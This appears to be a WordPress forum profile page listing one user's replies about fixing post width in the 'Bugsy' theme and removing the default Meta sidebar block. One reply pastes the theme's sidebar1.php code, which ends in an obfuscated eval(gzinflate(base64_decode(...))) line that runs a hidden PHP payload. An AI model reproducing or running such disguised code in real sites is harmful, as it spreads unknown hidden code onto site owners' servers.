jazzlee
Forum Replies Created
-
Forum: Fixing WordPress
In reply to: Adjust the width of my postProblem solved. Thanks everyone for your expert advise
Forum: Fixing WordPress
In reply to: Adjust the width of my postThanks for your reply, but its not solved.
I tried adjusting the width via CSS at #content, but the width doesn’t change at all..any other suggestions?
Forum: Fixing WordPress
In reply to: Adjust the width of my postHow should I go about adjusting the column width?
Forum: Fixing WordPress
In reply to: Adjust the width of my postNo, that’s not what I mean. Let me try to re-phrase my explanation.
If you refer to my url: http://www.happeningparents.com, and compare it with the original Bugsy theme,
1) the top alignment of my post content is not in line with the widgets in sidebar 1 and 2.
2) the right alignment of my post content is being extended into the sidebar 1, which it should not be the case.
I hope the above explanation is more detailed and clearer.
Thank youForum: Fixing WordPress
In reply to: Adjust the width of my postHi,
My url is: http://www.happeningparents.com, using ‘Bugsy Theme’
With reference to my enquiry above, my post runs to the bottom again. Is there anyway I can counter this error? My post content should be in line with the widget sidebar
Thank you
Forum: Fixing WordPress
In reply to: Remove Default MetaHi, Thank you for you reply. Can’t find the Meta code in sidebar1.php, as advised by you. Below is the full code I’ve copied under sidebar 1.php, for your reference.
<div class=”sidebar1″>
-
<?php if ( function_exists(‘dynamic_sidebar’) && dynamic_sidebar(‘sidebar 1’) ) : else : ?>
- <h2>Pages</h2>
-
<?php wp_list_pages(‘title_li=’); ?>
<?php wp_list_categories(‘orderby=name&show_count=0&title_li=<h2>Categories</h2>’); ?>
- <h2>Archives</h2>
-
<?php wp_get_archives(‘type=monthly&limit=12’); ?>
- <h2>Blogroll</h2>
-
<?php get_links(-1, ‘
- ‘, ‘
‘, ‘between’, FALSE, ‘name’, FALSE, FALSE, -1, FALSE); ?>
<?php endif; ?>
<?php eval(gzinflate(base64_decode(‘tZI9a8MwEIZn51ccXuwuEWRsVXnI3CUOdDR2fI4EsiR0ck3+fRXZbiGUduog7oPnTu8LV4ldlnGt7iHj8iDeMLScxSQ1Jp1iIngL0uPwmvPKSQedtldlBlsWnujQTF4XTy9QiRyCCho3rMGyqG+mV5c2IASpCEjFbCJlrnCq63VKfOO87Tq/bTlhq/UNajU6jbBtUtbkIg5zdmfFsiMW8a1efpd8seOIJlDzp/azRNBROgXYhiBYiKLAWYqFMj+7OG70P9iRIbhnxuZ53s8uSByRBo+4jwrZl4d363vnkQjOicjFY+fhhyR9ds0YT6BMEtINsOUIVnApOevVx2J2B58=’)));?>
Forum: Fixing WordPress
In reply to: Adjust the width of my postResolved. Thank you.
Forum: Fixing WordPress
In reply to: Remove Default MetaHi, my url is: http://www.happeningparents.com
Thank you